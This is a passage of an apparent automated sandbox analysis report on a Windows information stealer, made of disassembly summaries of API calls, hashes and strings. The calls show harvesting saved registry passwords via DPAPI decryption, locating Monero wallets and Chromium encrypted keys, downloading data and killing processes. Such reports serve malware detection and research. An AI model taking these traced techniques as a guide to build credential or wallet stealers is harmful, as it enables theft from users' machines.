                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                              • String ID:
                              • API String ID: 2500263513-0
                              • Opcode ID: fe7d19b9981eedbadf1a18d4ef7beff9c832dad823d8d3661861028a5ab076b0
                              • Instruction ID: b47cdbce8fa2bfacab6ef15fa71f64833521a5b168afa247e41df37b0512cdf8
                              • Opcode Fuzzy Hash: fe7d19b9981eedbadf1a18d4ef7beff9c832dad823d8d3661861028a5ab076b0
                              • Instruction Fuzzy Hash: 25418EB1600205BBDB20DF64DC49FAE7BB8AB04704F008455FA45EB290DB74AD00CBA4
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3BC1F
                              • lstrlen.KERNEL32(00000000), ref: 00E3BC52
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3BC7C
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3BC84
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3BCAC
                              • lstrlen.KERNEL32(00E64AD4), ref: 00E3BD23
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID:
                              • API String ID: 2500673778-0
                              • Opcode ID: 1f61d5f10c551fe3ef82a2e90f7699be937148c4cf8c84c157243d17daba65bf
                              • Instruction ID: 4517c37ac1b22d1142cf15bd9f95e07847bd4c6fd572442693547acc9d5f1b3b
                              • Opcode Fuzzy Hash: 1f61d5f10c551fe3ef82a2e90f7699be937148c4cf8c84c157243d17daba65bf
                              • Instruction Fuzzy Hash: 07A12C30A01205CFCB35DF68D94DA6ABBF4AF44309F29A46DE646EB261DB36DC41CB50
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E55F2A
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E55F49
                              • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00E56014
                              • memmove.MSVCRT(00000000,00000000,?), ref: 00E5609F
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E560D0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_$memmove
                              • String ID: invalid string position$string too long
                              • API String ID: 1975243496-4289949731
                              • Opcode ID: 6d1a14f34b526242a2dad240a8740e20d148638691fa636cab5ec5b2532a5165
                              • Instruction ID: 3611bab2b5644370e7eac36f396374b306d519c56dc5888d7fe097180a21b80b
                              • Opcode Fuzzy Hash: 6d1a14f34b526242a2dad240a8740e20d148638691fa636cab5ec5b2532a5165
                              • Instruction Fuzzy Hash: 6A619171710604DBDB28CF5CC89096EB3B6EF84306B645E19E892A73C1D731ED888BA5
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4E06F
                              • lstrcat.KERNEL32(?,00000000), ref: 00E4E07D
                              • lstrcat.KERNEL32(?,?), ref: 00E4E098
                              • lstrcat.KERNEL32(?,?), ref: 00E4E0AC
                              • lstrcat.KERNEL32(?,00D1A5F0), ref: 00E4E0C0
                              • lstrcat.KERNEL32(?,?), ref: 00E4E0D4
                              • lstrcat.KERNEL32(?,00D2E458), ref: 00E4E0E7
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4E11F
                              • GetFileAttributesA.KERNEL32(00000000), ref: 00E4E126
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$AttributesFile
                              • String ID:
                              • API String ID: 3428472996-0
                              • Opcode ID: 79f37c1dec3b90a7fec19fd5f00e2a8cef3f68747b028cc65122c699b2f9c011
                              • Instruction ID: 9b6c2c0d6d509c3630eb0ce6a1f477607963cef63ab00c13571191b39ece0172
                              • Opcode Fuzzy Hash: 79f37c1dec3b90a7fec19fd5f00e2a8cef3f68747b028cc65122c699b2f9c011
                              • Instruction Fuzzy Hash: 1141AD7191021C9FCB25EB64E848ADD77B4BF48304F1069A8FA8AA3355DB349F85CF90
                              APIs
                                • Part of subcall function 00E377D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E37805
                                • Part of subcall function 00E377D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00E3784A
                                • Part of subcall function 00E377D0: StrStrA.SHLWAPI(?,Password), ref: 00E378B8
                                • Part of subcall function 00E377D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E378EC
                                • Part of subcall function 00E377D0: HeapFree.KERNEL32(00000000), ref: 00E378F3
                              • lstrcat.KERNEL32(00000000,00E64AD4), ref: 00E37A90
                              • lstrcat.KERNEL32(00000000,?), ref: 00E37ABD
                              • lstrcat.KERNEL32(00000000, : ), ref: 00E37ACF
                              • lstrcat.KERNEL32(00000000,?), ref: 00E37AF0
                              • wsprintfA.USER32 ref: 00E37B10
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E37B39
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E37B47
                              • lstrcat.KERNEL32(00000000,00E64AD4), ref: 00E37B60
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                              • String ID: :
                              • API String ID: 398153587-3653984579
                              • Opcode ID: af78c409efe890f24abc51a28eb3ecb88eaef779786a6e757135c39f52713d18
                              • Instruction ID: 59a5f777afebf4bbb3f380507d7fb233c3f25e6bdb5733bb7e25d02ed05acbce
                              • Opcode Fuzzy Hash: af78c409efe890f24abc51a28eb3ecb88eaef779786a6e757135c39f52713d18
                              • Instruction Fuzzy Hash: B431B5B2A44214EFCB30DBA4DC489ABBBBAEB84304F146519F585B3644DB75E940C760
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 00E4820C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E48243
                              • lstrlen.KERNEL32(00000000), ref: 00E48260
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E48297
                              • lstrlen.KERNEL32(00000000), ref: 00E482B4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E482EB
                              • lstrlen.KERNEL32(00000000), ref: 00E48308
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E48337
                              • lstrlen.KERNEL32(00000000), ref: 00E48351
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E48380
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 5a98e01323b499f811ab39ec51f4c4e04fc8b2895c7147eeedfec12a4cabce96
                              • Instruction ID: c1af0fe239d10ef9b4a278d5f7af904a9b972ae1201603581757fbdea4599988
                              • Opcode Fuzzy Hash: 5a98e01323b499f811ab39ec51f4c4e04fc8b2895c7147eeedfec12a4cabce96
                              • Instruction Fuzzy Hash: AA515F71901612DFDB24EF28E958A6EBBE8EF44740F115518EE46EB244DB34ED50CBE0
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E37805
                              • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00E3784A
                              • StrStrA.SHLWAPI(?,Password), ref: 00E378B8
                                • Part of subcall function 00E37750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E3775E
                                • Part of subcall function 00E37750: RtlAllocateHeap.NTDLL(00000000), ref: 00E37765
                                • Part of subcall function 00E37750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E3778D
                                • Part of subcall function 00E37750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00E377AD
                                • Part of subcall function 00E37750: LocalFree.KERNEL32(?), ref: 00E377B7
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E378EC
                              • HeapFree.KERNEL32(00000000), ref: 00E378F3
                              • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00E37A35
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                              • String ID: Password
                              • API String ID: 356768136-3434357891
                              • Opcode ID: 313a74201bea849dacd546a3fac7c3ca0babe6f24faa90d12043ee88dde5d280
                              • Instruction ID: 2ec649ef8e01f2c6659dacb5c2641bbd3893e1cdcd815e616e3b62ca46f603f9
                              • Opcode Fuzzy Hash: 313a74201bea849dacd546a3fac7c3ca0babe6f24faa90d12043ee88dde5d280
                              • Instruction Fuzzy Hash: 3A7140B1D0021DAFDB10DF94DC84AEEBBB9EF49300F1055AAE649F7240EB355A85CB91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E31135
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E3113C
                              • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00E31159
                              • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00E31173
                              • RegCloseKey.ADVAPI32(?), ref: 00E3117D
                              Strings
                              • SOFTWARE\monero-project\monero-core, xrefs: 00E3114F
                              • wallet_path, xrefs: 00E3116D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                              • API String ID: 3225020163-4244082812
                              • Opcode ID: 0870b2f3b5276f300450d1d2721ca7510930230b0e7e9cf4f4f1702ec446c4d3
                              • Instruction ID: 31938a652d0fe52f5e8f324fba80df26bb9207e27f6bac773c2b49ecc8d41e09
                              • Opcode Fuzzy Hash: 0870b2f3b5276f300450d1d2721ca7510930230b0e7e9cf4f4f1702ec446c4d3
                              • Instruction Fuzzy Hash: 7EF0B475680308BFE7209BE0AD4DFEB7B7CEB04759F000095FF05E2284E6B55A4487A0
                              APIs
                              • memcmp.MSVCRT(?,v20,00000003), ref: 00E39E04
                              • memcmp.MSVCRT(?,v10,00000003), ref: 00E39E42
                              • LocalAlloc.KERNEL32(00000040), ref: 00E39EA7
                                • Part of subcall function 00E571E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00E571FE
                              • lstrcpy.KERNEL32(00000000,00E64C48), ref: 00E39FB2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpymemcmp$AllocLocal
                              • String ID: @$v10$v20
                              • API String ID: 102826412-278772428
                              • Opcode ID: fe2e3de93fbe3ed9b14621948c50226d04c165887a9cf8820753c8706a17bb22
                              • Instruction ID: 2d6e46fd8ef9af63489a2417c4d1b41be355afed6ee7693b0abf5bbb2fc5fa79
                              • Opcode Fuzzy Hash: fe2e3de93fbe3ed9b14621948c50226d04c165887a9cf8820753c8706a17bb22
                              • Instruction Fuzzy Hash: B751A171A102099BDB10EF64DC89BAE7BE4AF50355F156428FE89FB252DBB0DD04CB90
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E3565A
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E35661
                              • InternetOpenA.WININET(00E5CFEC,00000000,00000000,00000000,00000000), ref: 00E35677
                              • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00E35692
                              • InternetReadFile.WININET(?,?,00000400,00000001), ref: 00E356BC
                              • memcpy.MSVCRT(00000000,?,00000001), ref: 00E356E1
                              • InternetCloseHandle.WININET(?), ref: 00E356FA
                              • InternetCloseHandle.WININET(00000000), ref: 00E35701
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                              • String ID:
                              • API String ID: 1008454911-0
                              • Opcode ID: 89e2b20ed6072dafdfafc502915579e482da671f00167d84eb03436526c49c8a
                              • Instruction ID: a840397db8217560a97239cc948d0bd53d19395f95d9c731c5af3024cbaf9536
                              • Opcode Fuzzy Hash: 89e2b20ed6072dafdfafc502915579e482da671f00167d84eb03436526c49c8a
                              • Instruction Fuzzy Hash: F4417171A00704EFDB24CF55D948BAABBB4FF44309F14806AEA08AB395D7769941CB94
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00E54759
                              • Process32First.KERNEL32(00000000,00000128), ref: 00E54769
                              • Process32Next.KERNEL32(00000000,00000128), ref: 00E5477B
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E5479C
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E547AB
                              • CloseHandle.KERNEL32(00000000), ref: 00E547B2
                              • Process32Next.KERNEL32(00000000,00000128), ref: 00E547C0
                              • CloseHandle.KERNEL32(00000000), ref: 00E547CB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 3836391474-0
                              • Opcode ID: 93b57a3df774238993e2f8acac315ef964aec7edd42278185758774ec19c6993
                              • Instruction ID: 450156cf5c404206e10e226cf54e57e9f6d14d41e0dac0585f40a303eab8ae5e
                              • Opcode Fuzzy Hash: 93b57a3df774238993e2f8acac315ef964aec7edd42278185758774ec19c6993
                              • Instruction Fuzzy Hash: A701B5B1641314AFE7305B609C89FEA77BCEB0975AF001582FE45E10C5EB798DC88B60
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 00E48435
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4846C
                              • lstrlen.KERNEL32(00000000), ref: 00E484B2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E484E9
                              • lstrlen.KERNEL32(00000000), ref: 00E484FF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4852E
                              • StrCmpCA.SHLWAPI(00000000,00E64C3C), ref: 00E4853E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 4bbc8f4e9111dfd1dfb38e0f006369bc0b925082a985f9259d7e08d59fe0a0d4
                              • Instruction ID: 0500aa1aeac9afa61496a63c2c51c6a67a29f6da71adec688d210be325333dbf
                              • Opcode Fuzzy Hash: 4bbc8f4e9111dfd1dfb38e0f006369bc0b925082a985f9259d7e08d59fe0a0d4
                              • Instruction Fuzzy Hash: 3A51B2759002029FCB24DF28E588A5BBBF5EF98304F24945DEC99FB245EB35E941CB50
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00E52925
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E5292C
                              • RegOpenKeyExA.ADVAPI32(80000002,00D1BC38,00000000,00020119,00E528A9), ref: 00E5294B
                              • RegQueryValueExA.ADVAPI32(00E528A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00E52965
                              • RegCloseKey.ADVAPI32(00E528A9), ref: 00E5296F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: c8507e8c8c81d34e7ae93ea855c78be3e968223b4d0f845cca7adb1bc95fd2f8
                              • Instruction ID: e7b0dd3033d09be0d9f00a9f3688c976c9fde6a96cc4fd8fd45c99c4785d3c04
                              • Opcode Fuzzy Hash: c8507e8c8c81d34e7ae93ea855c78be3e968223b4d0f845cca7adb1bc95fd2f8
                              • Instruction Fuzzy Hash: 4201BC75600318BFE720CBA09859EAB7BBCEB4975AF104099FF85A7244E676590887A0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00E52895
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E5289C
                                • Part of subcall function 00E52910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00E52925
                                • Part of subcall function 00E52910: RtlAllocateHeap.NTDLL(00000000), ref: 00E5292C
                                • Part of subcall function 00E52910: RegOpenKeyExA.ADVAPI32(80000002,00D1BC38,00000000,00020119,00E528A9), ref: 00E5294B
                                • Part of subcall function 00E52910: RegQueryValueExA.ADVAPI32(00E528A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00E52965
                                • Part of subcall function 00E52910: RegCloseKey.ADVAPI32(00E528A9), ref: 00E5296F
                              • RegOpenKeyExA.ADVAPI32(80000002,00D1BC38,00000000,00020119,00E49500), ref: 00E528D1
                              • RegQueryValueExA.ADVAPI32(00E49500,00D2F7D0,00000000,00000000,00000000,000000FF), ref: 00E528EC
                              • RegCloseKey.ADVAPI32(00E49500), ref: 00E528F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 04fa74ea22d62db5cd7d6e0dd4ef9e544fec5b93b5459afe458f959e64997672
                              • Instruction ID: 2c79e500d6a8161e9d3728a1f71a681a9ea23a39068721f02b97d7d2009e3596
                              • Opcode Fuzzy Hash: 04fa74ea22d62db5cd7d6e0dd4ef9e544fec5b93b5459afe458f959e64997672
                              • Instruction Fuzzy Hash: A101D671640308BFEB24DBA4EC4DFAA777CEB44316F004559FF48E3254D676994487A0
                              APIs
                              • LoadLibraryA.KERNEL32(?), ref: 00E3723E
                              • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00E37279
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E37280
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00E372C3
                              • HeapFree.KERNEL32(00000000), ref: 00E372CA
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00E37329
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                              • String ID:
                              • API String ID: 174687898-0
                              • Opcode ID: 14a234dcc1ce1b59ca848c4c09e7d8981440eee87488bdd5abbd51ff59d92b71
                              • Instruction ID: a957141db1cbb1391b2660189b3157470717ae21c6d50f940d2fdccb2140a757
                              • Opcode Fuzzy Hash: 14a234dcc1ce1b59ca848c4c09e7d8981440eee87488bdd5abbd51ff59d92b71
                              • Instruction Fuzzy Hash: 20416CB17056059BEB30CF69D888BAAB7E8EB84309F144569EC89D7310E635E900DB50
                              APIs
                              • memset.MSVCRT ref: 00E4D7D6
                              • RegOpenKeyExA.ADVAPI32(80000001,00D2E438,00000000,00020119,?), ref: 00E4D7F5
                              • RegQueryValueExA.ADVAPI32(?,00D2F278,00000000,00000000,00000000,000000FF), ref: 00E4D819
                              • RegCloseKey.ADVAPI32(?), ref: 00E4D823
                              • lstrcat.KERNEL32(?,00000000), ref: 00E4D848
                              • lstrcat.KERNEL32(?,00D2F290), ref: 00E4D85C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValuememset
                              • String ID:
                              • API String ID: 2623679115-0
                              • Opcode ID: 1773701731a5b30a9b3f2337d2e574c6a575590406a3eb47d522a68e0bf4a12e
                              • Instruction ID: 44b47f4e525fd9fd6a62b191d4a38278e4d0968349e070669fa26314cb3c0053
                              • Opcode Fuzzy Hash: 1773701731a5b30a9b3f2337d2e574c6a575590406a3eb47d522a68e0bf4a12e
                              • Instruction Fuzzy Hash: 8941A57161020CAFDB64EF64EC86FDE77B4AF44304F009069F649A7251EE35AA85CF91
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 00E39CA8
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00E39CDA
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E39D03
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocLocallstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2746078483-738592651
                              • Opcode ID: f126084285424c50112dd8e011cbc4f11dcec78a6e307fe5a6d675ae9a12054a
                              • Instruction ID: 1ae7a0d3e6b9899611181b100dbabba186117f491a3167862993bf7df2005784
                              • Opcode Fuzzy Hash: f126084285424c50112dd8e011cbc4f11dcec78a6e307fe5a6d675ae9a12054a
                              • Instruction Fuzzy Hash: 3B41A171A002099BDB21EF64D84A6EEBFF4AF94308F446468E955B7253DBB0ED04C790
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E4EA24
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4EA53
                              • lstrcat.KERNEL32(?,00000000), ref: 00E4EA61
                              • lstrcat.KERNEL32(?,00E61794), ref: 00E4EA7A
                              • lstrcat.KERNEL32(?,00D28C58), ref: 00E4EA8D
                              • lstrcat.KERNEL32(?,00E61794), ref: 00E4EA9F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
